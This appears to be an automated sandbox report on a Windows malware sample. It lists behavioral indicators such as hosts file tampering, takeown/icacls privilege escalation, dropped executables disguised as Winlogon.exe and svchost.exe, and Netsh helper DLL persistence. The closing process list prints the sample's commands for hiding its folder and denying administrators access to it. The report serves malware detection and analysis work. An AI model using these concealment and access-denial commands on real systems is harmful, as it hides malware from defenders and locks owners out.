| SHA512 | 1742c58168c612f7e3631d7a0c5c821a2dfd9be52a1b4323089c5c8151c646b7d9c06dc015fd53bc4f426d6d18eb276b8d5575864501c6f856ff48b243f09745 |
memory/1752-33-0x0000000000400000-0x00000000004D3000-memory.dmp
memory/1752-39-0x0000000000400000-0x00000000004D3000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-12 14:46
Reported
2024-10-12 14:49
Platform
win10v2004-20241007-en
Max time kernel
119s
Max time network
116s
Command Line
Signatures
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | \??\c:\windows\system32\drivers\etc\hosts_bak | C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe | N/A |
| File opened for modification | \??\c:\windows\system32\drivers\etc\hosts_bak | C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe | N/A |
| File created | \??\c:\windows\system32\drivers\etc\hosts | C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe | N/A |
Modifies Windows Firewall
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe | N/A |
| N/A | N/A | C:\ProgramData\gambecxd\svchost.exe | N/A |
| N/A | N/A | C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Indicator Removal: File Deletion
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe | C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\eajbdcmd | C:\Windows\system32\attrib.exe | N/A |
| File created | C:\Program Files\common files\system\wk.ini | C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe | N/A |
| File opened for modification | C:\Program Files\common files\system\wk.ini | C:\Windows\system32\attrib.exe | N/A |
| File created | C:\Program Files\common files\system\jk.ini | C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe | N/A |
| File opened for modification | C:\Program Files\common files\system\jk.ini | C:\Windows\system32\attrib.exe | N/A |
| File created | C:\Program Files\ls.txt | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe | C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe | N/A |
| N/A | N/A | C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe | N/A |
| N/A | N/A | C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe | N/A |
| N/A | N/A | C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe | N/A |
| N/A | N/A | C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe | N/A |
| N/A | N/A | C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\ProgramData\gambecxd\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe | N/A |
| N/A | N/A | C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe
"C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +r +h +s "C:\Program Files\Common Files\Microsoft Shared\eajbdcmd"
C:\Windows\system32\attrib.exe
attrib +r +h +s "C:\Program Files\Common Files\Microsoft Shared\eajbdcmd"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Cacls "C:\Program Files\Common Files\Microsoft Shared\eajbdcmd" /t /e /c /d administrator
C:\Windows\system32\cacls.exe
Cacls "C:\Program Files\Common Files\Microsoft Shared\eajbdcmd" /t /e /c /d administrator
C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe
"C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe"
C:\Windows\system32\cmd.exe
